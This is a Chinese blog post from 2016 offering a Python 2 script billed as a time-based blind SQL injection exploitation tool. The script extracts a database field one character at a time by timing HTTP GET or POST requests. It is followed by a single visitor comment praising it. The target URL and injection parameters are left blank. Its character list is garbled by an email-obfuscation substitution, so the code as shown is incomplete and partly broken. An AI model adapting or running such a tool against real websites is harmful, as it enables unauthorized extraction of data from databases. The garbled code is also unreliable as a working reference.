现在的位置: 首页 > 个人作品 > 正文
SQL盲注漏洞利用工具
2016年02月03日 个人作品, 安全工具, 安全开发 ⁄ 共 1337字 评论数 1 ⁄ 被围观 5,417 次+



#! /usr/bin/env python
# coding:utf-8
# --------------------------------------------------
# file_name: SQL延时注入漏洞利用工具
# Author: secsky
# website: http://www.secsky.cn
# --------------------------------------------------

import os
import sys
import time
import requests

#发送HTTP GET请求并获取返回数据
def get(url,params):
    res = requests.get(url,params = params).status_code
    return res

#发送HTTP POST请求并获取返回数据
def post(url,params):
    res = requests.post(url,data=params).status_code
    return res

#利用SQL注入漏洞获取数据
def get_data():
    #定义URL
    #url = ""
    #定义数据提交方式;支持GET和POST方式
    method = "GET"
    #定义payloads
    payloads = list('[email protected]_.')
    #定义目标字段长度
    length = 3
    #目标字段名称
    name = ""
    print "Is working, please wait......"
    for i in range(1,(length + 1)):
        for payload in payloads:
            #构造HTTP请求参数
            params = ""
            #获取开始时间
            start_time = time.time()
            if method == 'GET':
                get(url,params)
            elif method == "POST":
                post(url,params)
            else:
                print "Please enter correct method"
                break
            #获取结束时间
            end_time = time.time()
            #计算花费时间
            count_time = end_time - start_time
            if count_time > 3:
                name += payload
                print '\rtarget:%s' % (name),
                sys.stdout.flush()
    print "\nend,target:%s" % (name)

if __name__ == '__main__':
    get_data()

目前有 1 条留言 其中:访客:1 条, 博主:0 条

  1. 路人甲 : 2016年04月09日12:20:44  1楼 @回复 回复

    叼叼叼

给我留言

留言无头像?